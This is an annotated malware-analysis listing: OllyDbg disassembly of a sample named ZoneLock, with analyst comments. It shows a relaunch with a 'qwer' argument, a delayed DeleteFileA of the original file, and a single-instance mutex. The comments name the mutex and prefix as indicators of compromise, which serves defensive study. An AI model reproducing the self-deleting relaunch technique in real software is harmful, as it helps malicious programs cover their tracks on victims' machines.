ZoneLockup.exe”
; --- Excerpt of Listing 8.3: OllyDbg disassembly of ZoneLock (x86-32, Intel syntax) ---
; Two code paths are visible, and both are cut at the page edge: the first PUSH of
; the sprintf call (the %s argument) sits on the line before this excerpt, and the
; JNZ at 00402792 jumps to 0040279B, which is outside it.
; Path 1 (004026FF-00402731): format "qwer%s" into a stack buffer, pass that buffer
;   as the Parameters of a ShellExecuteA "open", then ExitProcess(0).
; Path 2 (00402736-00402796): search this process's own command line for "qwer";
;   if the match is longer than 8 bytes, Sleep 2 s and DeleteFileA the path that
;   follows the "qwer" prefix. Then create the mutex "botsmfdutpex" and exit if it
;   already existed (single-instance check).
; Win32 APIs are stdcall (callee pops its arguments); sprintf/strstr come from
; CRTDLL and are cdecl, hence the ADD ESP after each call.
; Register roles in path 2: ESI = pointer to "qwer..." inside the command line
;   (NULL if absent), EAX = its length, then ESI+4 = path handed to DeleteFileA.
; Analyst notes: the mutex name and the "qwer" argument prefix are fixed strings and
;   usable as host-based indicators. Path 1 launching a process with "qwer<path>"
;   and path 2 deleting "<path>" after a delay reads like a relaunch-and-remove
;   handshake between an original image and a copy — inferred from the strings
;   here, not shown; confirm against the code that jumps to 004026FF / 00402736.
; sprintf(buf, "qwer%s", <arg>): the <arg> PUSH is on the line cut off above; its
; OllyDbg comment ends in "ZoneLockup.exe".
004026FF PUSH ZoneLock.0040553D ; format = “qwer%s”
00402704 LEA EAX,DWORD PTR SS:[EBP-29C] ; EAX = &buf (local at EBP-29C; size not visible here)
0040270A PUSH EAX ; s
0040270B CALL <JMP.&CRTDLL.sprintf>
00402710 ADD ESP,0C ; cdecl: pop the 3 sprintf arguments
; ShellExecuteA(NULL, "open", <string at 00404010>, buf, NULL, 5)
; 5 = SW_SHOW. The launched target is whatever string lives at 00404010 (OllyDbg
; shows “C:\WINNT\system32”); buf, i.e. "qwer<...>", becomes its Parameters.
00402713 PUSH 5 ; IsShown = 5
00402715 PUSH 0 ; DefDir = NULL
00402717 LEA EAX,DWORD PTR SS:[EBP-29C] ; same buffer sprintf filled above
0040271D PUSH EAX ; Parameters
0040271E PUSH ZoneLock.00404010 ; FileName = “C:\WINNT\system32”
00402723 PUSH ZoneLock.00405696 ; Operation = “open”
00402728 PUSH 0 ; hWnd = NULL
0040272A CALL <JMP.&SHELL32.ShellExecuteA>
; The ShellExecuteA result is not checked; the process exits unconditionally.
0040272F PUSH 0 ; ExitCode = 0
00402731 CALL <JMP.&KERNEL32.ExitProcess>
; --- ExitProcess does not return, so 00402736 is only reached as a jump target
; from code outside this excerpt.
; p = strstr(GetCommandLineA(), "qwer")
00402736 CALL <JMP.&KERNEL32.GetCommandLineA>
0040273B PUSH ZoneLock.00405538 ; s2 = “qwer”
00402740 PUSH EAX ; s1
00402741 CALL <JMP.&CRTDLL.strstr>
00402746 ADD ESP,8 ; cdecl: pop the 2 strstr arguments
00402749 MOV ESI,EAX ; ESI = p
0040274B OR ESI,ESI ; ZF set iff p == NULL (same effect as TEST ESI,ESI)
0040274D JE SHORT ZoneLock.00402775 ; no "qwer" in the command line -> skip to mutex
; Inline strlen(p): EAX = -1; do { EAX++; } while (p[EAX] != 0);
0040274F MOV ECX,ESI
00402751 OR EAX,FFFFFFFF ; EAX = -1
00402754 INC EAX
00402755 CMP BYTE PTR DS:[ECX+EAX],0
00402759 JNZ SHORT ZoneLock.00402754
; Require strlen(p) > 8, i.e. at least 5 bytes after the 4-byte "qwer" prefix.
0040275B CMP EAX,8
0040275E JBE SHORT ZoneLock.00402775 ; unsigned compare; too short -> skip to mutex
00402760 PUSH 7D0 ; Timeout = 2000. ms
00402765 CALL <JMP.&KERNEL32.Sleep>
; DeleteFileA(p + 4): the path taken verbatim from the command line after "qwer";
; the return value is not checked.
0040276A MOV EAX,ESI
0040276C ADD EAX,4 ; skip the "qwer" prefix
0040276F PUSH EAX ; FileName
00402770 CALL <JMP.&KERNEL32.DeleteFileA>
; Single-instance check: CreateMutexA(NULL, TRUE, "botsmfdutpex"). The handle is
; stored in the global at 00404650 before the error check, so the
; "already exists" path below exits with that handle still written.
00402775 PUSH ZoneLock.004050A3 ; MutexName = “botsmfdutpex”
0040277A PUSH 1 ; InitialOwner = TRUE
0040277C PUSH 0 ; pSecurity = NULL
0040277E CALL <JMP.&KERNEL32.CreateMutexA>
00402783 MOV DWORD PTR DS:[404650],EAX ; global mutex handle = EAX
00402788 CALL <JMP.&KERNEL32.GetLastError>
0040278D CMP EAX,0B7 ; 0xB7 = 183 = ERROR_ALREADY_EXISTS
00402792 JNZ SHORT ZoneLock.0040279B ; first instance -> continue at 0040279B (outside this excerpt)
; Another instance already holds the mutex -> exit quietly.
00402794 PUSH 0 ; ExitCode = 0
00402796 CALL <JMP.&KERNEL32.ExitProcess>
Listing 8.3 (continued)